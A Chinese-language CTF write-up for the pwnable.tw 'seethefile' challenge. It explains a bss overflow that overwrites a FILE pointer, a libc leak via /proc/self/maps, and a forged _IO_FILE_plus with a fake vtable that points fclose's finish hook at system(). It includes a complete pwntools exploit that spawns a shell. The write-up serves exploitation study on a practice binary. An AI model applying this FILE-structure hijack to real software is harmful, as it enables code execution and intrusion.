Pwnable.tw seethefile

2020-10-18

Pwnable.tw seethefile

第二次做这道题了，搞懂了第一次做这题不懂的一些细节✈

程序允许我们open_file,read_file,write_file，唯一发现的漏洞是在leave_massage的时候输入name可以覆写到bss上的fd.

case 5:
        printf("Leave your name :");
        __isoc99_scanf("%s", name);
        printf("Thank you %s ,see you next time\n", name);

.bss:0804B0C0 magicbuf        db 1A0h dup(?)          ; DATA XREF: openfile+33↑o
.bss:0804B0C0                                         ; readfile+17↑o ...
.bss:0804B260                 public name
.bss:0804B260 name            db 20h dup(   ?)        ; DATA XREF: main+9F↑o
.bss:0804B260                                         ; main+B4↑o
.bss:0804B280 ; FILE *fp
.bss:0804B280 fp              dd ?                    ; DATA XREF: openfile+6↑r
.bss:0804B280                                         ; openfile+AD↑w ...

并且题目功能是在于对文件的操作，调用fread,fwrite,fopen,fclose，那这题就是考察io_file了。

对于io_file的利用，一般是直接覆盖vtable结构体指针指向可控的内存，再者就是构造整个io_file_plus结构体，但这种方法要求我们构造时要绕过一些检查。

#define _IO_IS_FILEBUF 0x2000
if (fp->_IO_file_flags & _IO_IS_FILEBUF)
  _IO_un_link ((struct _IO_FILE_plus *) fp);

_IO_acquire_lock (fp);
if (fp->_IO_file_flags & _IO_IS_FILEBUF)
  status = _IO_file_close_it (fp);
else
  status = fp->_flags & _IO_ERR_SEEN ? -1 : 0;
_IO_release_lock (fp);
_IO_FINISH (fp);

我们要构造出_IO_IS_FILEBUF=0的_flags，使得可以绕过上面两个检测例如_flags=0xffffdfff（原理在于0xdf=(11011111),0x20=(0010000),0xdf&0x20==0），最终执行_IO_FINISH (fp)；

在C语言中，成功调用fopen函数后会在堆上分配一块空间用于存放_IO_FILE_plus结构体，并且返回结构体的首地址，而在调用fclose时，最终会通过io_file_plus里的vatble调用相应的函数。

pwndbg> telescope 0x9003008 80
00:0000│   0x9003008 ◂— 0x0
01:0004│   0x900300c ◂— 0x161
02:0008│   0x9003010 ◂— 0xfbad2488   //_flags
03:000c│   0x9003014 —▸ 0x900321d ◂— 0xa5d6f73 ('so]\n')  //io_read_ptr
04:0010│   0x9003018 —▸ 0x90033aa ◂— 0x31203130 ('01 1')  //io_read_end
05:0014│   0x900301c —▸ 0x9003170 ◂— 0x30303030 ('0000')  //io_read_base
... ↓
0a:0028│   0x9003030 —▸ 0x9003570 ◂— 0x0
0b:002c│   0x9003034 ◂— 0x0
... ↓
0f:003c│   0x9003044 —▸ 0xf7fa1cc0 (_IO_2_1_stderr_) ◂— 0xfbad2086  //_chain
10:0040│   0x9003048 ◂— 0x3
11:0044│   0x900304c ◂— 0x0
... ↓
14:0050│   0x9003058 —▸ 0x90030a8 ◂— 0x0
15:0054│   0x900305c ◂— 0xffffffff
... ↓
17:005c│   0x9003064 ◂— 0x0
18:0060│   0x9003068 —▸ 0x90030b4 ◂— 0x0
19:0064│   0x900306c ◂— 0x0
... ↓
1c:0070│   0x9003078 ◂— 0xffffffff
1d:0074│   0x900307c ◂— 0x0
... ↓
27:009c│   0x90030a4 —▸ 0xf7fa0ac0 (_IO_file_jumps) ◂— 0x0  //vatable
28:00a0│   0x90030a8 ◂— 0x0
... ↓
pwndbg> telescope 0xf7fa0ac0 30
00:0000│   0xf7fa0ac0 (_IO_file_jumps) ◂— 0x0
... ↓
02:0008│   0xf7fa0ac8 (_IO_file_jumps+8) —▸ 0xf7e57990 (_IO_file_finish) ◂— push   ebx
03:000c│   0xf7fa0acc (_IO_file_jumps+12) —▸ 0xf7e583b0 (_IO_file_overflow) ◂— push   edi
04:0010│   0xf7fa0ad0 (_IO_file_jumps+16) —▸ 0xf7e58150 (_IO_file_underflow) ◂— push   ebp
05:0014│   0xf7fa0ad4 (_IO_file_jumps+20) —▸ 0xf7e59230 (_IO_default_uflow) ◂— push   ebx
06:0018│   0xf7fa0ad8 (_IO_file_jumps+24) —▸ 0xf7e5a0c0 (_IO_default_pbackfail) ◂— push   ebp

因此我们只要构造好_IO_FILE_plus结构体，并通过name的溢出改fd指向我们构造的_IO_FILE_plus结构体，再执行fclose即可完成利用。

首先要Leak，题目给了我们任意文件读的机会，因此我们可以通过读取**’/proc/self/maps’**（文件的内存信息存储于此）来得到libc地址。

接下来就是构造file_plus结构体，几处要点：

1.构造_flag=0xffffdfff，绕过检测去执行((struct IO_FILE_plus *)fp->vtable)->__finish(fp)

2.在fd指向内存的偏移为0x4位置写入’;$0’，;用来分隔命令。

3.io_file结构体大小为0x94，因此要填充满0x94。

4.vatble指针指向紧接着的file结构体的内存，方便后面的构造。

5.vtable结构体对应的__finish函数指针(第3个位置)写为system()

fake_struct:

pwndbg> telescope 0x804b300 80
00:0000│ eax  0x804b300 ◂— 0xffffdfff
01:0004│      0x804b304 ◂— 0x30243b /* ';$0' */
02:0008│      0x804b308 ◂— 0x0
... ↓
25:0094│      0x804b394 —▸ 0x804b398 —▸ 0xf7e28db0 (system) ◂— sub    esp, 0xc
26:0098│      0x804b398 —▸ 0xf7e28db0 (system) ◂— sub    esp, 0xc
... ↓
29:00a4│      0x804b3a4 ◂— 0x0

执行((struct IO_FILE_plus *)fp->vtable)->__finish(fp)相当于执行system(“xxx;$0”)得到shell🚩

EXP:

from pwn import *
context.log_level='debug'

def cmd(command):
	p.recvuntil("Your choice :")
	p.sendline(str(command))

def openfile(name):
	cmd(1)
	p.recvuntil('What do you want to see :')
	p.sendline(name)

def readfile():
	cmd(2)

def writefile():
	cmd(3)

def closefile():
	cmd(4)

def leave(name):
	cmd(5)
	p.recvuntil("Leave your name :")
	p.sendline(name)

def main(host,port=1234):
	global p
	if host:
		p=remote(host,port)
	else:
		p=process("./seethefile")

	openfile("/proc/self/maps")
	readfile()
	readfile()
	readfile()
	writefile()
	p.recvline()
	libc.address=int(p.recv(8),16)-0x1b4000+0x1000
	success("libc : "+hex(libc.address))
	fake_struct=0x0804B300
	payload='a'*0x20+p32(fake_struct)   #fd->fake_struct
	payload+='a'*(fake_struct-0x0804B280-4)
	payload+='\xff\xdf\xff\xff;$0\x00'.ljust(0x94, '\x00')
	payload+=p32(fake_struct+0x98)
	payload+=p32(libc.sym['system'])*3
	gdb.attach(p,'b*0x08048B0F')
	leave(payload)

	# gdb.attach(p)
	p.interactive()

if __name__ == "__main__":
	libc=ELF("/lib/i386-linux-gnu/libc.so.6")
	main(0)

fclose部分源码：

/* libio/iofclose.c */
int
_IO_new_fclose (_IO_FILE *fp)
{
  int status;

/*这里本来有个对版本进行检测的代码，根据FILE结构中_vtable_offset变量是否为0来判断，不为0则执行_IO_old_fclose*/
  /* First unlink the stream.  */
  if (fp->_IO_file_flags & _IO_IS_FILEBUF)
    _IO_un_link ((struct _IO_FILE_plus *) fp);  // unlink即：将fp指向的FILE结构体从_IO_list_all的单向链表中取下

  _IO_acquire_lock (fp);
  if (fp->_IO_file_flags & _IO_IS_FILEBUF)
    status = _IO_file_close_it (fp);   //关闭fp
  else
    status = fp->_flags & _IO_ERR_SEEN ? -1 : 0;
  _IO_release_lock (fp);
  _IO_FINISH (fp);
  if (fp->_mode > 0)
    {
#if _LIBC
      /* This stream has a wide orientation.  This means we have to free
     the conversion functions.  */
      struct _IO_codecvt *cc = fp->_codecvt;

      __libc_lock_lock (__gconv_lock);
      __gconv_release_step (cc->__cd_in.__cd.__steps);
      __gconv_release_step (cc->__cd_out.__cd.__steps);
      __libc_lock_unlock (__gconv_lock);
#endif
    }
  else
    {
      if (_IO_have_backup (fp))
    _IO_free_backup_area (fp);
    }
  if (fp != _IO_stdin && fp != _IO_stdout && fp != _IO_stderr)
    {
      fp->_IO_file_flags = 0;
      free(fp);
    }

  return status;
}

参考博文:
(https://www.jianshu.com/p/0176ebe02354)